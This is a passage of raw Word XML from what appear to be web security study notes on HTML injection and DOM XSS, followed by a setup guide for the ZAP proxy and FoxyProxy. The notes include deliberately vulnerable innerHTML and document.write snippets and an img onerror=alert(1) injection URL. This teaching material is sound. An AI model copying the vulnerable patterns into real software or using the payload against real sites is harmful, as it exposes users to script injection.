          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>INJECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3DAEC013" w:rsidP="449E37A7" w:rsidRDefault="3DAEC013" w14:paraId="274A4158" w14:textId="73B3CB95">
      <w:p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HTML injection is a type of injection vulnerability that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page.</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This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to </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modify</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the page content seen by the victims.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3DAEC013" w:rsidP="449E37A7" w:rsidRDefault="3DAEC013" w14:paraId="2C434121" w14:textId="2010EB1B">
      <w:p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This vulnerability occurs when user input is not correctly </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="00FC38F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sanitized,</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and the output is not encoded. An injection allows the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to distinguish (trust) legitimate parts from malicious parts of the page, and </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consequently</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will parse and execute the whole page in the victim’s context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="1836CA2B" w14:textId="1CECD5CD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3DAEC013" w:rsidP="449E37A7" w:rsidRDefault="3DAEC013" w14:paraId="3919D1A5" w14:textId="778C15BF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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There is a wide range of methods and attributes that could be used to </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render</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HTML content. If these methods are provided with an untrusted input, then there is </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an</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high risk of HTML injection vulnerability. For example, malicious HTML code can be injected via the </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innerHTML</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JavaScript method, usually used to </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render</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user-inserted HTML code. If strings are not correctly sanitized, the method can enable HTML injection. A JavaScript function that can be used for this purpose is </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document.write</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p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="5FA1A0EC" w14:textId="20C48FCF">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p>
    <w:p w:rsidR="3DAEC013" w:rsidP="449E37A7" w:rsidRDefault="3DAEC013" w14:paraId="3DF9EFF6" w14:textId="2C791CCB">
      <w:p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The following example shows a snippet of vulnerable code that allows an unvalidated input to be used to create dynamic HTML in the page context:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3DAEC013" w:rsidP="449E37A7" w:rsidRDefault="3DAEC013" w14:paraId="69B1E93E" w14:textId="7C119C67">
      <w:p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var</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userposition</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location.href.indexOf</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("user=");</w:t>
      </w:r>
      <w:r>
        <w:br/>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var user=</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location.href.substring</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(userposition+5);</w:t>
      </w:r>
      <w:r>
        <w:br/>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document.getElementById</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("Welcome").</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innerHTML</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3DAEC01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Hello, "+user;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="414A9979" w14:textId="6329964E">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p>
    <w:p w:rsidR="6636B3A3" w:rsidP="449E37A7" w:rsidRDefault="6636B3A3" w14:paraId="2573FA37" w14:textId="5D2E9A07">
      <w:p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The following example shows vulnerable code using the </w:t>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document.write</w:t>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function:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6636B3A3" w:rsidP="449E37A7" w:rsidRDefault="6636B3A3" w14:paraId="0FFE0750" w14:textId="2F0E3A90">
      <w:p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var</w:t>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t>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userposition</w:t>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location.href.indexOf</w:t>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("user=");</w:t>
      </w:r>
      <w:r>
        <w:br/>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var user=</w:t>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location.href.substring</w:t>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(userposition+5);</w:t>
      </w:r>
      <w:r>
        <w:br/>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document.write</w:t>
      </w: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("&lt;h1&gt;Hello, " + user +"&lt;/h1&gt;");</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="6636B3A3" w:rsidP="449E37A7" w:rsidRDefault="6636B3A3" w14:paraId="7106639F" w14:textId="788CA18A">
      <w:p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In both examples, this vulnerability can be exploited with an input such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6636B3A3" w:rsidP="449E37A7" w:rsidRDefault="6636B3A3" w14:paraId="79B0D595" w14:textId="23D5959C">
      <w:p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hyperlink r:id="R6c9a0916709a4ca2">
        <w:r w:rsidRPr="449E37A7" w:rsidR="6636B3A3">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http://vulnerable.site/page.html?user=&lt;img%20src='aaa'%20onerror=</w:t>
        </w:r>
        <w:r w:rsidRPr="449E37A7" w:rsidR="6636B3A3">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alert(</w:t>
        </w:r>
        <w:r w:rsidRPr="449E37A7" w:rsidR="6636B3A3">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1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6636B3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)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="5EEFC866" w14:textId="52A69A5D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="643EE619" w:rsidP="449E37A7" w:rsidRDefault="643EE619" w14:paraId="28C11555" w14:textId="116D839E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="643EE619">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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>How to Test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="643EE619" w:rsidP="449E37A7" w:rsidRDefault="643EE619" w14:paraId="3C67274F" w14:textId="4EBD1CFC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Consider the following DOM XSS exercise </w:t>
      </w:r>
      <w:hyperlink r:id="R07d35060ef274332">
        <w:r w:rsidRPr="449E37A7" w:rsidR="643EE619">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0"/>
            <w:szCs w:val="20"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://www.domxss.com/domxss/01_Basics/06_jquery_old_html.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="643EE619" w:rsidP="449E37A7" w:rsidRDefault="643EE619" w14:paraId="77CF45FA" w14:textId="6AB0846B">
      <w:p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The HTML code </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contains</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the following script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="643EE619" w:rsidP="449E37A7" w:rsidRDefault="643EE619" w14:paraId="7DE7DDC9" w14:textId="5A51A6A1">
      <w:p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&lt;script </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src</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js</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/jquery-1.7.1.js"&gt;&lt;/script&gt;</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&lt;script&gt;</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function </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setMessage</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var</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location.hash.slice</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(1);</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$("div[id="+t+"]").</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text(</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"The DOM is now loaded and can be manipulated.");</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$(document</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).ready</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setMessage</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$(window</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).bind</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hashchange</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setMessage</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&lt;/script&gt;</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&lt;body&gt;</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&lt;script </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src</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js</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/embed.js"&gt;&lt;/script&gt;</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&lt;span&gt;&lt;a </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href</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="#message" &gt; Show Here&lt;/a&gt;&lt;div id="message"&gt;Showing Message1&lt;/div&gt;&lt;/span&gt;</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&lt;span&gt;&lt;a </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href</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="#message1" &gt; Show Here&lt;/a&gt;&lt;div id="message1"&gt;Showing Message2&lt;/div&gt;</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&lt;span&gt;&lt;a </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href</w:t>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="#message2" &gt; Show Here&lt;/a&gt;&lt;div id="message2"&gt;Showing Message3&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="643EE61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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="10A0C1BC" w14:textId="1639AA56">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0532CDF9" w:rsidP="764D761D" w:rsidRDefault="0532CDF9" w14:paraId="7A5F2770" w14:textId="374247B9">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="7BB9858B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>OWASP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7BB9858B" w:rsidP="764D761D" w:rsidRDefault="7BB9858B" w14:paraId="484790BF" w14:textId="37AC1789">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:num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764D761D" w:rsidR="7BB9858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Open Worldwide Application Security Project</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="7BB9858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(OWASP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="764D761D" w:rsidRDefault="37573033" w14:paraId="417BF452" w14:textId="6FA065FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:num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764D761D" w:rsidR="375730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ZAP (short for </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="375730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Zed Attack Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="375730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p w:rsidR="37573033" w:rsidP="764D761D" w:rsidRDefault="37573033" w14:paraId="4A6D2D20" w14:textId="46631444">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:num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764D761D" w:rsidR="375730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formerly known as OWASP ZAP, is an open-source web application security scanner. </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="375730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It is intended to be used by both those new to application security as well as professional penetration testers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="55820FFD" w:rsidRDefault="37573033" w14:paraId="52A5567A" w14:textId="1DC45F69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>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75730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The OWASP Risk Assessment Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="76CED609" w:rsidP="449E37A7" w:rsidRDefault="76CED609" w14:paraId="587B5DAE" w14:textId="5A50A115">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76CED60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Set a Proxy server </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6FB7647E" w:rsidP="449E37A7" w:rsidRDefault="6FB7647E" w14:paraId="67FC7376" w14:textId="5B6E9DB0">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6FB7647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Download the Foxy proxy extension in </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6FB7647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Firefox</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6FB7647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browser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="76CED609" w:rsidP="449E37A7" w:rsidRDefault="76CED609" w14:paraId="4491116C" w14:textId="6BCF4F31">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76CED60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Go to Firefox browser &gt;Settings &gt; Configure Proxy Access to the Internet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="76CED609" w:rsidP="449E37A7" w:rsidRDefault="76CED609" w14:paraId="672A670B" w14:textId="1FD910B9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="76CED609">
        <w:drawing>
          <wp:inline wp14:editId="0271C04A" wp14:anchorId="499519A6">
            <wp:extent cx="4572000" cy="2762250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="73348843" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R74110b7cb0a84199">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449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="6D402B72" w14:textId="500E6223">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="1E2A466A" w14:textId="4D821689">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="5178BF0A" w14:textId="6FCC28E7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="275F2E00" w14:textId="7F95CF49">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="68F18750" w14:textId="32FC7C0A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="03C814A7" w14:textId="69EBDD5C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="76CED609" w:rsidP="449E37A7" w:rsidRDefault="76CED609" w14:paraId="7BDC882A" w14:textId="7B05A030">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="76CED609">
        <w:rPr/>
        <w:t xml:space="preserve">ZAP tool </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="76CED609" w:rsidP="449E37A7" w:rsidRDefault="76CED609" w14:paraId="5A34737E" w14:textId="50890FEB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="76CED609">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to Tools &gt; Local Proxies </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="76CED609" w:rsidP="449E37A7" w:rsidRDefault="76CED609" w14:paraId="5DE55B68" w14:textId="1DC2D2F4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="76CED609">
        <w:drawing>
          <wp:inline wp14:editId="3E804B79" wp14:anchorId="77377E5A">
            <wp:extent cx="4572000" cy="3590925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="407844995" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Reb765b09abad422a">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3590925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A43C8E6" w:rsidP="449E37A7" w:rsidRDefault="6A43C8E6" w14:paraId="342DB1C0" w14:textId="2970DDC5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="6A43C8E6">
        <w:rPr/>
        <w:t xml:space="preserve">We can enable the ZAP proxy server and we can also </w:t>
      </w:r>
      <w:r w:rsidR="6A43C8E6">
        <w:rPr/>
        <w:t>disable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A43C8E6" w:rsidP="449E37A7" w:rsidRDefault="6A43C8E6" w14:paraId="0C8430DB" w14:textId="4EE95625">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="6A43C8E6">
        <w:drawing>
          <wp:inline wp14:editId="0AEE9AB6" wp14:anchorId="7CAFB9FE">
            <wp:extent cx="4572000" cy="2409825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="378527621" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Ra880d5ea49f34785">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37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="3D1FC99C" w14:textId="3676E3BD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="34435FD5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The File menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="6F780CBA" w14:textId="3ED3B003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:num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34435FD5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">New </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="34435FD5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Session:</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This creates a new session</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p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="018EC02E" w14:textId="5AF7C08E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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Open Session: </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Opening a session without saving the current session will lose </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all</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the data in the current session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="16F4AF8D" w14:textId="0AADA9E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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Open </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Recent:</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 list of files that have been recently accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="280D366B" w14:textId="45961B41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:num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34435FD5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Persist Session: </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This </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persists</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the current session.</w:t>
      </w:r>
      <w:r>
        <w:br/>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While the session is always stored in a database on disk, it will be lost when ZAP is stopped unless it has been persisted.</w:t>
      </w:r>
      <w:r>
        <w:br/>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You only need to </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persist</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it once - after </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that</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="34435FD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all changes will be saved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="1AF4F0DD" w14:textId="7DC57547">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:num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2BAAC5F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Snapshot Session:</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2BAAC5F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It will suggest the same filename as the persisted session with a date-time string appended to </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2BAAC5F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it, and</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2BAAC5F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allow the user to set whatever name they choose.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="22EBFD64" w14:textId="0E3BB51C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:num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2BAAC5F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Snapshot</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2BAAC5F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as property:</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2BAAC5F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This allows you to set the session name and description.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="03A4EB60" w14:textId="46B6EF1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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2BAAC5F6">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t xml:space="preserve">Import Context: </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2BAAC5F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Allows to import a </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2BAAC5F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Context</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2BAAC5F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p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="4FAF78A4" w14:textId="0F977C53">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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2BAAC5F6">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t xml:space="preserve">Export </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2BAAC5F6">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t>Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2BAAC5F6">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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2BAAC5F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Allows to export a Context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0FB91355" w:rsidP="55820FFD" w:rsidRDefault="0FB91355" w14:paraId="0D62F10B" w14:textId="443ABE2D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="0FB91355">
        <w:drawing>
          <wp:inline wp14:editId="7AF3FE65" wp14:anchorId="5B835A69">
            <wp:extent cx="3286910" cy="3201025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="457759317" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rf26d2ad1422647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86910" cy="3201025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
